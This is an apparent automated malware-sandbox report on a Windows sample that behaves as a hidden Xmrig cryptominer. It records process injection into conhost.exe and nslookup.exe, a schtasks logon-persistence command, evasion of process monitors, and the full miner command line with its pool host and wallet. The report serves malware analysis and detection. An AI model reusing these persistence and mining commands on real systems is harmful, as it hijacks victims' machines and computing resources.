              Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@26/5@1/1
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\IOAshdohSha.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
              Source: boooba.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\boooba.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: boooba.exe | ReversingLabs: Detection: 71%
              Source: nslookup.exe | String found in binary or memory: id-cmc-addExtensions
              Source: nslookup.exe | String found in binary or memory: set-addPolicy
              Source: unknown | Process created: C:\Users\user\Desktop\boooba.exe "C:\Users\user\Desktop\boooba.exe"
              Source: C:\Users\user\Desktop\boooba.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
              Source: unknown | Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
              Source: C:\Users\user\IOAshdohSha.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              Source: C:\Users\user\IOAshdohSha.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
              Source: C:\Users\user\Desktop\boooba.exe | Section loaded: apphelp.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
              Source: C:\Users\user\IOAshdohSha.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Section loaded: apphelp.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: powrprof.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: winrnr.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\nslookup.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\conhost.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: boooba.exe | Static file information: File size 2234368 > 1048576
              Source: boooba.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00

              Persistence and Installation Behavior

              Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
              Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\IOAshdohSha.exe
              Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe

              Boot Survival

              Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\IOAshdohSha.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\nslookup.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\nslookup.exe | System information queried: FirmwareTableInformation
              Source: nslookup.exe, 0000000D.00000002.2902391217.0000019A4A588000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: C:\Windows\System32\conhost.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\conhost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\boooba.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 15759250000 protect: page execute and read and write
Source: C:\Users\user\IOAshdohSha.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 13CA14E0000 protect: page execute and read and write
Source: C:\Users\user\IOAshdohSha.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 1E311770000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 29965300000 protect: page execute and read and write
Source: C:\Users\user\Desktop\boooba.exe | Thread created: C:\Windows\System32\conhost.exe EIP: 59250000
Source: C:\Users\user\IOAshdohSha.exe | Thread created: C:\Windows\System32\conhost.exe EIP: A14E0000
Source: C:\Users\user\IOAshdohSha.exe | Thread created: C:\Windows\System32\conhost.exe EIP: 11770000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Thread created: C:\Windows\System32\conhost.exe EIP: 65300000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | NtCreateThreadEx: Direct from: 0x401A17
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | NtWriteVirtualMemory: Direct from: 0x401D57
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | NtProtectVirtualMemory: Direct from: 0x401DD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | NtClose: Direct from: 0x401CD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | NtAllocateVirtualMemory: Direct from: 0x401D97
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe | Thread register set: target process: 6288
Source: C:\Windows\System32\conhost.exe | Thread register set: target process: 5480
Source: C:\Users\user\Desktop\boooba.exe | Memory written: C:\Windows\System32\conhost.exe base: 15759250000
Source: C:\Users\user\IOAshdohSha.exe | Memory written: C:\Windows\System32\conhost.exe base: 13CA14E0000
Source: C:\Users\user\IOAshdohSha.exe | Memory written: C:\Windows\System32\conhost.exe base: 1E311770000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140000000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140001000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140367000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140753000
